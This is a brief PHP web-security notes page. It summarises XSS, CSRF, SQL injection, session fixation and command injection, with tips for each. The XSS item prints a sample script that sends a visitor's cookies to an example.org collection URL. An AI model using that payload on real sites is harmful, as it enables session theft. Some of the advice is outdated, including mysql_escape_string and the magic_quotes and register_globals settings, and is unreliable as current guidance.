Profile Picture
IT Made Easy
The site provides some rough IT Notes that make your life easier. The site currently has notes on HTML, CSS, Regex, OOPS, JS, JQuery, PHP, Java, ASP.NET, C#, Database, Linux, URL Rewrite, SEO, Project Management and Hosting. Please do share this site if you like.

Security

Next
Next
  • Encrypt data, filter input and escape output. Example filter_var($field, FILTER_SANITIZE_EMAIL) , filter_var($field, FILTER_VALIDATE_EMAIL) etc
  • Turn off special php.ini setting called magic_quotes_gpc. mysql_escape_string( ) are required to make user input safe for database entry
  • Put key files outside document root. So not accessible. Also provide appropriate file ppermissions and block relvant files and folders using .htaccess
  • Set expose_php to OFF, use a different file extension and set display_errors to off. Set register_globals to OFF
  • Spoof forms can be used to attack website through form submissions from different locations by copying the code replacing the form action with absolute url and replicating. Form submission cannot be prevented but by spam check, HTTP_REFERER checking and tight server validation we can secure our site
  • Cross Site Scripting (XSS) is a method where a javascript is injected in a third party site say through comment form and the execution of the script will send visiting users personal data like cookies.

<script>

document.location = http://example.org/getcookies.php?cookies=+ document.cookie;

</script>

This can be prevented by proper escaping of output. So javascript wont execute while reading say a blog comment.

  • Cross Site Request Forgeries utilizes the applications trust of user. Here a user when clicks on a third party image is taken to a site from where an action is made. Here the link forces an action because the website has a vulnerability that when action is passed as a parameter some action occurs. Now they can even simulate POST request. Here the user must be logged in. To prevent this our authentic form should have some hidden random value from session and check whether the value POSTed is the same as in SESSION for authenticity
  • SQL Injection. Use prepare or driver specific escape_string
  • Session fixation is an attack where attacker fixes a session and makes you access the application with that session id. Once you login or move to higher privilege the attacker may be able to ride on the same session. Since it is the session id that the server cares about. This can be prevented by regerating session id using session_regenerate_id() on each higher privilege change
  • Session hijacking is gaining the user's session and utilizing it. It can be checked by seeing if there is a HTTP_USER_AGENT change. But this is not 100% safe.
  • Remote Code Injection is an attack that occurs when a require or include code portion is based on a tainted user input
  • Command injection occurs when tainted user input is used for shell execution. PHP provides escapeshellcmd() and escapeshellarg() as a means to properly escape shell output.
  • In shared hosting open_basedir (Prevents opening files outside a path using inlcude etc), disable_functions (disables certain functions for security), and disable_classes   (disables certain classes for security)

IT Notes

by VinodSebastian



IT Downloads


Catalogue